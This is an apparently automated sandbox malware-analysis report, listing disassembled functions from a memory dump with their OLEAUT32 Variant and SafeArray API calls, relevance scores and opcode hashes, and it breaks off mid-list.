Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArraySafe$InitVariant$CreateElementVector$AccessData_malloc
String ID:
API String ID: 2723946344-0
Opcode ID: 4b22c427a638ce002ca6dedeeaea9f1f2b88d16c8cb234dc8f1a24ea080d38e9
Instruction ID: ff7269d17c9d61af63abec22eb8991ea31a45a3b55b0e205c03321d7805cbe40
Opcode Fuzzy Hash: 4b22c427a638ce002ca6dedeeaea9f1f2b88d16c8cb234dc8f1a24ea080d38e9
Instruction Fuzzy Hash: 109155B56083019FD304CFA8C880E5BBBF9BF89308F15895DE8958B751E778E905CB92

Function 6CF244C0 Relevance: 19.8, APIs: 13, Instructions: 261
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CF244FF
VariantInit.OLEAUT32(?), ref: 6CF24505
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CF24516
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CF24551
VariantClear.OLEAUT32(?), ref: 6CF2455A
SafeArrayCreateVector.OLEAUT32(0000000D,00000000,00000002), ref: 6CF24579
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CF24594
SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 6CF245B5
SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 6CF245CE
std::tr1::_Xweak.LIBCPMT ref: 6CF2475A
SafeArrayDestroy.OLEAUT32(?), ref: 6CF24777
VariantClear.OLEAUT32(?), ref: 6CF24787
VariantClear.OLEAUT32(?), ref: 6CF2478D

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArraySafe$Variant$Element$Clear$CreateInitVector$DestroyXweakstd::tr1::_
String ID:
API String ID: 1304965753-0
Opcode ID: 868ca7ef3a8b719cef6b640b983a52df02eb020a24fb0d34bfc1dcf072d3d21d
Instruction ID: 454fc9821f9fdd7a6ac85e55434bec96a82dbfe5b951cfb004cf7104b26e517e
Opcode Fuzzy Hash: 868ca7ef3a8b719cef6b640b983a52df02eb020a24fb0d34bfc1dcf072d3d21d
Instruction Fuzzy Hash: A1A14B75A012069BDB54DFE4C984EAFB7B9FF8D710F14462CE506ABB80CA74E941CB60

Function 6CF2BF00 Relevance: 18.2, APIs: 12, Instructions: 215
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CF2BF3D
VariantInit.OLEAUT32(?), ref: 6CF2BF4A
VariantInit.OLEAUT32(?), ref: 6CF2BF50
VariantInit.OLEAUT32(?), ref: 6CF2BF56
VariantInit.OLEAUT32 ref: 6CF2C04D
VariantCopy.OLEAUT32(?,?), ref: 6CF2C054
VariantInit.OLEAUT32 ref: 6CF2C085
VariantCopy.OLEAUT32(?,?), ref: 6CF2C08C
VariantClear.OLEAUT32(?), ref: 6CF2C118
VariantClear.OLEAUT32(?), ref: 6CF2C11E
VariantClear.OLEAUT32(?), ref: 6CF2C124
VariantClear.OLEAUT32(?), ref: 6CF2C12A

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Variant$Init$Clear$Copy
String ID:
API String ID: 3833040332-0
Opcode ID: 2e04266f19284bf2218e24308ed4453e1697122ced6cd825178085910ef6bcc6
Instruction ID: 6fd0416d031a8991fb95f1844df05e763def37e60437a9138d24a0d9fcc5d16f
Opcode Fuzzy Hash: 2e04266f19284bf2218e24308ed4453e1697122ced6cd825178085910ef6bcc6
Instruction Fuzzy Hash: 14817A71901219AFDB04EFE8C884FEEBBB9FF49308F144559E905A7640DB75EA05CBA0

Function 6CF264D0 Relevance: 18.2, APIs: 12, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32 ref: 6CF2650C
VariantInit.OLEAUT32(?), ref: 6CF26519
VariantInit.OLEAUT32(?), ref: 6CF26520
SafeArrayCreateVector.OLEAUT32(0000000C), ref: 6CF26531
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF2656D
VariantClear.OLEAUT32(?), ref: 6CF26576
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF265B6
VariantClear.OLEAUT32(?), ref: 6CF265BF
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF26666
VariantClear.OLEAUT32(?), ref: 6CF26677
VariantClear.OLEAUT32(?), ref: 6CF2667E
VariantClear.OLEAUT32(?), ref: 6CF26685

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Variant$Clear$ArraySafe$Init$Element$CreateDestroyVector
String ID:
API String ID: 1625659656-0
Opcode ID: b3fe3dd5d1ea55083074d384d9afbc27467e5baa1b634730db94ff78b0be6968
Instruction ID: 76dc3c35622d810cf2e09e9b4f7c3bc2fd1ef5be6e78c2315ea84c11d054db4d
Opcode Fuzzy Hash: b3fe3dd5d1ea55083074d384d9afbc27467e5baa1b634730db94ff78b0be6968
Instruction Fuzzy Hash: 455126726197059FC701DF64C880A6BBBF8EFCA704F108A1DF9558B250EB75E9058B92

Function 6CF2CB90 Relevance: 18.1, APIs: 12, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CF2CBCA
VariantInit.OLEAUT32(?), ref: 6CF2CBD3
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CF2CBE4
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CF2CBF6
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF2CC0D
SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6CF2CC39
VariantClear.OLEAUT32(?), ref: 6CF2CC42
SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6CF2CC5D
SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6CF2CC77
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF2CCEC
VariantClear.OLEAUT32(?), ref: 6CF2CCFC
VariantClear.OLEAUT32(?), ref: 6CF2CD02

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArraySafe$Variant$Element$Clear$CreateInitVector$Destroy
String ID:
API String ID: 3548156019-0
Opcode ID: 7e0d3a82e8c92dc2a4bbb434ea00f54bf2b0f9f137033c5829aad51410c61f7c
Instruction ID: e1eeb356b8434461ff9aee147ec103146722ffef2da292eb44eff921a22a92fb
Opcode Fuzzy Hash: 7e0d3a82e8c92dc2a4bbb434ea00f54bf2b0f9f137033c5829aad51410c61f7c
Instruction Fuzzy Hash: B85130B5D002499FDB00DFA8C884EEEBFB8FF49714F01816AEA15A7741D774A905CBA0

Function 6CF1A350 Relevance: 16.7, APIs: 11, Instructions: 206
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CF1A393
VariantInit.OLEAUT32(?), ref: 6CF1A39A
VariantInit.OLEAUT32(?), ref: 6CF1A3A1
VariantCopy.OLEAUT32(?,?), ref: 6CF1A3EF
VariantClear.OLEAUT32(?), ref: 6CF1A409
VariantClear.OLEAUT32(?), ref: 6CF1A50A
VariantClear.OLEAUT32(?), ref: 6CF1A511
VariantClear.OLEAUT32(?), ref: 6CF1A518
VariantClear.OLEAUT32(?), ref: 6CF1A55E
VariantClear.OLEAUT32(?), ref: 6CF1A565
VariantClear.OLEAUT32(?), ref: 6CF1A56C

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Variant$Clear$Init$Copy
String ID:
API String ID: 3214764494-0
Opcode ID: b273de02bb57efc67bbd096fff2bbcac93dfe8fa7cf4e4f1120ee3e02a502820
Instruction ID: a9145b4a7035572a9175cf43358a0adb425a8629b228a9629ad028a81218ede4
Opcode Fuzzy Hash: b273de02bb57efc67bbd096fff2bbcac93dfe8fa7cf4e4f1120ee3e02a502820
Instruction Fuzzy Hash: EF7124726083419FD300DF69C880A5BB7F8BF89714F118A6DFA59CB691D731E908CB62

Function 6CF2CD20 Relevance: 15.5, APIs: 10, Instructions: 485
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6CF2CD5C
VariantInit.OLEAUT32(?), ref: 6CF2CD65
VariantInit.OLEAUT32(?), ref: 6CF2CD6B
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF2CD76
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF2CDAA
VariantClear.OLEAUT32(?), ref: 6CF2CDB7
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF2D2A5
VariantClear.OLEAUT32(?), ref: 6CF2D2B5
VariantClear.OLEAUT32(?), ref: 6CF2D2BB
VariantClear.OLEAUT32(?), ref: 6CF2D2C1

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
String ID:
API String ID: 2515392200-0
Opcode ID: 41eddfbb232ba51998288b3f660253afb7f2856943f587f97189153dafb3040f
Instruction ID: 19b41581356519af8b0e567cbf48a90d92b8ba9c9bf61e6b7fafc977ed71e180
Opcode Fuzzy Hash: 41eddfbb232ba51998288b3f660253afb7f2856943f587f97189153dafb3040f
Instruction Fuzzy Hash: EB12F475A15705AFC758DBE8DD84DAAB3B9BF8D300F144668F50AABB91CA30F841CB50

Function 6CF266A0 Relevance: 15.2, APIs: 10, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32 ref: 6CF266DB
VariantInit.OLEAUT32 ref: 6CF266EA
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CF26700
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF2673A
VariantClear.OLEAUT32(?), ref: 6CF26747
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF26787
VariantClear.OLEAUT32(?), ref: 6CF26794
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF26849
VariantClear.OLEAUT32(?), ref: 6CF2685A
VariantClear.OLEAUT32(?), ref: 6CF26861

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Variant$ArrayClearSafe$ElementInit$CreateDestroyVector
String ID:
API String ID: 551789342-0
Opcode ID: 01e387d09ffbc108d077c821c3cabe9c4798af7db07ef5d51ea3e810b47c3fbc
Instruction ID: 363b61450c020eaa0917024d0628647fa568d0405e831b9a1a3c474b87c8f670
Opcode Fuzzy Hash: 01e387d09ffbc108d077c821c3cabe9c4798af7db07ef5d51ea3e810b47c3fbc
Instruction Fuzzy Hash: 14517876609205AFC701CFA4C844B9BBBF9EF89714F118A19F944DB250EB34E905CBA2

Function 6CF2840E Relevance: 13.8, APIs: 9, Instructions: 332
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF284BF
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF284D2
SafeArrayGetElement.OLEAUT32 ref: 6CF2850A

Part of subcall function 6CF23A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF23B71
Part of subcall function 6CF23A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF23B83

Part of subcall function 6CF269C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CF26A08
Part of subcall function 6CF269C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF26A15
Part of subcall function 6CF269C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CF26A41

SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEBF

Part of subcall function 6CF1DFB0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CF1DFF6
Part of subcall function 6CF1DFB0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF1E003
Part of subcall function 6CF1DFB0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CF1E02F

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArraySafe$Bound$Destroy$Element
String ID:
API String ID: 959723449-0
Opcode ID: 10bb30f6e06b111f0f57b5be139418e5a8007f1db057a5da01333f62eda0285e
Instruction ID: f8b02479a7038cebaf5597efa341b13b890162fe74a00434dea4de8b5ad04add
Opcode Fuzzy Hash: 10bb30f6e06b111f0f57b5be139418e5a8007f1db057a5da01333f62eda0285e
Instruction Fuzzy Hash: 44C19070A016049FDB00CFA9CC90FA9B7B9AF45308F208599E919EB786DB75ED45CB50

Function 6CF24170 Relevance: 13.8, APIs: 9, Instructions: 277COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CF241AF
VariantInit.OLEAUT32(?), ref: 6CF241B5
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF241C0
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CF241F5
VariantClear.OLEAUT32(?), ref: 6CF24201
std::tr1::_Xweak.LIBCPMT ref: 6CF24450
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2446D
VariantClear.OLEAUT32(?), ref: 6CF2447D
VariantClear.OLEAUT32(?), ref: 6CF24483

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
String ID:
API String ID: 1774866819-0
Opcode ID: 19c1572d764e4a9105a669e28f3c4d0bfb7e4d0820391e9bcfc5536bde6d7ac3
Instruction ID: e87429868d1d71645f5409356b3403318d2e6bfcf4b77ee5c2153aeb4100b0c3
Opcode Fuzzy Hash: 19c1572d764e4a9105a669e28f3c4d0bfb7e4d0820391e9bcfc5536bde6d7ac3
Instruction Fuzzy Hash: 69B138756006099FCB14DF99C884EEAB7F9BF8D310F15856CE50AABB91DA34F841CB60

Function 6CF2C530 Relevance: 13.8, APIs: 9, Instructions: 259COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CF2C56F
VariantInit.OLEAUT32(?), ref: 6CF2C575
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF2C580
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF2C5B5
VariantClear.OLEAUT32(?), ref: 6CF2C5C1
std::tr1::_Xweak.LIBCPMT ref: 6CF2C7D4
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2C7F1
VariantClear.OLEAUT32(?), ref: 6CF2C801
VariantClear.OLEAUT32(?), ref: 6CF2C807

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
String ID:
API String ID: 1774866819-0
Opcode ID: 0fdd2238e36303cdc9497c36d3f3d1e234ebd8f9e7b03110e58bae19d95fdea9
Instruction ID: eb9efbb0dc14deb61ff7ff8c815cb4ae21e7d491a4ad5592f9e73d29564eae22
Opcode Fuzzy Hash: 0fdd2238e36303cdc9497c36d3f3d1e234ebd8f9e7b03110e58bae19d95fdea9
Instruction Fuzzy Hash: F8A14875A006099FDB14DF98C884EEAB7F9BF8D310F158569E506ABB90DB34F841CB60

Function 6CF26880 Relevance: 13.6, APIs: 9, Instructions: 117COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CF268B2
VariantInit.OLEAUT32(?), ref: 6CF268BD
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CF268D7
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF268FD
VariantClear.OLEAUT32(?), ref: 6CF26909
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF26923
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF26981
VariantClear.OLEAUT32(?), ref: 6CF2699E
VariantClear.OLEAUT32(?), ref: 6CF269A4

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Variant$ArraySafe$Clear$ElementInit$CreateDestroyVector
String ID:
API String ID: 3529038988-0
Opcode ID: 49ea99a139bce029c431922a874879a6ad9ab32e0081497515c1797eb5227108
Instruction ID: bc3a1d9addf575a6f7c1cafd40546ee0f1352d10c2c4f617ae622aea838055d6
Opcode Fuzzy Hash: 49ea99a139bce029c431922a874879a6ad9ab32e0081497515c1797eb5227108
Instruction Fuzzy Hash: E6418EB2E01209EFDB01CFA5C844AEEBBB8FF99314F15411AE505E7340EB75A905CBA0

Function 6CF1C020 Relevance: 12.3, APIs: 8, Instructions: 309COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CF1C074
VariantInit.OLEAUT32(?), ref: 6CF1C07B
VariantInit.OLEAUT32(?), ref: 6CF1C082
